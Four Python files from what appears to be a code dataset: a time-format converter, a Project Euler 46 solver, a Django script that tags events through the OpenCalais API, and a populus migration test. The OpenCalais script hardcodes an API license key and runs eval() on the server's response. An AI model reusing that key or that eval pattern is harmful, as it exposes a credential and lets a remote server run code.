12,796 | 321378a89c5e76b0d55e6b14b3219e5f357b418e | #!/bin/python3
# TIME CONVERSION
import os
import sys
#
# Convert AM/PM time to military time
#
# Sample input:
# 07:05:45PM
# Sample output:
# 19:05:45
#
def timeConversion(s):
# Counter in s[x:x] starts at 1 not 0
# For s[:x] counter starts from start until xth element including x
hour = int(s[:2]) # Selects everything until 2nd element
# For s[x:] counter starts after x until end
meridian = s[8:] # Selects everything after 8th element
# Special-case '12AM' == 0, '12PM' == 12 not 24
if (hour == 12):
hour = 0
if (meridian == 'PM'):
hour += 12
solution = "%02d" % hour + s[2:8]
return solution
if __name__ == '__main__':
# f = open(os.environ['OUTPUT_PATH'], 'w')
s = input("Enter time in AM/PM format for example (07:00:00PM):")
result = timeConversion(s)
print(result)
# f.write(result + '\n')
# f.close()
|
12,797 | b3e8a2dbbd86ef5ced5af2ca286719e3d8818c41 | #!/usr/bin/python
# Imports #
import sys
sys.path.insert(0, "../../include/python/");
import eulersupport;
import eulermath;
def f(n):
#We treat prime as number that can be written.
if(eulermath.PrimesHelper().is_prime(n)):
return True;
closest_prime = eulermath.PrimesHelper().find_all_primes_up_to_n(n);
index_of_prime = eulermath.PrimesHelper().get_index_of_prime(closest_prime);
#First prime, if we cannot add a sum of prime + 2 * square
#with this prime (2) we found a number that cannot be written.
while(closest_prime != 2):
#Increase the square until the sum be greater than number.
for i in xrange(1, n):
current_square = i ** 2;
s = closest_prime + (2 * current_square);
#The number of formula p + 2*sq is greater
#than your target number, go out of square loop.
#and try to decrease the prime.
if(s > n): break;
#We found our number.
if(s == n):
print "%d : [ %d + (2 * %d^2) ]" %(n, closest_prime, i);
return True;
#Find the previous prime.
index_of_prime -= 1;
closest_prime = eulermath.PrimesHelper().get_prime_at_index(index_of_prime);
return False;
# Functions #
# Problem description:
# It was proposed by Christian Goldbach that every odd composite number can be
# written as the sum of a prime and twice a square.
# 9 = 7 + (2 * 1^2)
# 15 = 7 + (2 * 2^2)
# 21 = 3 + (2 * 3^2)
# 25 = 7 + (2 * 3^2)
# 27 = 19 + (2 * 2^2)
# 33 = 31 + (2 * 1^2)
# It turns out that the conjecture was false.
# What is the smallest odd composite that cannot be written as the sum of
# a prime and twice a square?
def run():
result = -1;
for i in eulermath.infinite_range(9, 2):
if(not f(i)):
result = i;
break;
print result;
#Report Completion.
eulersupport.write_output(result);
def run_full():
eulersupport.name = "euler46";
run();
def run_test():
eulersupport.name = "euler46-Test";
eulersupport.write_output("I'd not test");
def main():
run_mode = eulersupport.get_run_mode();
if(run_mode == eulersupport.kRunModeFull):
run_full();
else:
run_test();
if __name__ == '__main__':
main();
|
12,798 | 055c71ea2294a2fcc00b4d0172cf38678128ac54 | import urllib2
import random
import MySQLdb
import pprint
import pdb
from events.models import Event, Meta
from datetime import datetime
key="ne62f3m8swrsv2cvmf78rkx2"
def call(body):
url = "http://api.opencalais.com/tag/rs/enrich"
opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request(url, data=body)
request.add_header('content-type', 'text/raw')
request.add_header('accept', 'application/json')
request.add_header('x-calais-licenseID', key)
request.get_method = lambda: 'POST'
url = opener.open(request)
print url
for line in url.readlines():
result = eval(line)
return result
def fetch():
for e in Event.objects.all().order_by('start_time'):
sentence = e.description
name = e.name
eventid = e.event_id
d = Meta.objects.filter(eventid=str(eventid))
if len(Meta.objects.filter(eventid=str(eventid))) is not 0:
print "present"
continue
result = call(name+' '+sentence)
#pprint.pprint(result)
#print name+' '+sentence
#break
for key, value in result.items():
if key == 'doc' or value.has_key('language'):
continue
insert(key, value, eventid)
print key
print '-------'
def insert(key, value, eventid):
default = ''
namer = shortnamer = tickerr = rid = default
cid = key+'_'+str(eventid)
eventid = eventid
category = value.get('category', default)
categoryName = value.get('categoryName', default)
detection = value.get('detection', default)
typeGroup = value.get('_typeGroup', default)
typeG = value.get('_type', default)
typeReference = value.get('_typeReference', default)
score = value.get('score', default)
classifierName = value.get('classifierName', default)
url = value.get('url', default)
name = value.get('name', default)
nationality = value.get('nationality', default)
resolutions = value.get('resolutions', default)
resolutions_str = resolutions
instances = value.get('instances', default)
instances_str = instances
if resolutions is not default:
resolutions = resolutions[0]
namer = resolutions.get('name', default)
rid = resolutions.get('id', default)
tickerr = resolutions.get('ticker', default)
shortnamer = resolutions.get('shortname', default)
if instances is default:
instances = [{'suffix': default,
'prefix': default,
'detection': default,
'length': default,
'offset': default,
'exact' : default }]
else:
pass
#print instances
#instances = eval(instances)
for inst in instances:
cid = cid+' '+str(random.randint(1,10))
try:
Meta.objects.create(cid=cid,
eventid=eventid,
category=category,
categoryName=categoryName,
detection=inst.get('detection', default),
typeGroup=typeGroup,
typeG=typeG,
typeReference=typeReference,
score=score,
classifierName=classifierName,
url=url,
name=name,
nationality=nationality,
resolutions=resolutions_str,
namer = namer,
tickerr = tickerr,
rid = rid,
shortnamer = shortnamer,
instances=instances_str,
suffix=inst.get('suffix', default),
prefix=inst.get('prefix', default),
length=inst.get('length', default),
offset=inst.get('offset', default),
exact=inst.get('exact', default),
)
except Exception as e:
print "eception occured",e
fetch()
|
12,799 | 882118b818855a4476c3dbbba8f3bb5af00ed137 | from populus.migrations import (
Migration,
DeployContract,
)
from populus.migrations.writer import (
write_migration,
)
from populus.migrations.migration import (
get_migration_classes_for_execution,
)
def test_migrated_chain_fixture(project_dir, write_project_file, request,
MATH):
write_project_file('contracts/Math.sol', MATH['source'])
write_project_file('migrations/__init__.py')
class TestMigration(Migration):
migration_id = '0001_initial'
dependencies = []
operations = [
DeployContract('Math'),
]
compiled_contracts = {
'Math': {
'code': MATH['code'],
'code_runtime': MATH['code_runtime'],
'abi': MATH['abi'],
},
}
with open('migrations/0001_initial.py', 'w') as migration_file:
write_migration(migration_file, TestMigration)
project = request.getfuncargvalue('project')
assert len(project.migrations) == 1
unmigrated_chain = request.getfuncargvalue('unmigrated_chain')
registrar = unmigrated_chain.registrar
assert not registrar.call().exists('contract/Math')
chain = request.getfuncargvalue('chain')
assert registrar.call().exists('contract/Math')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.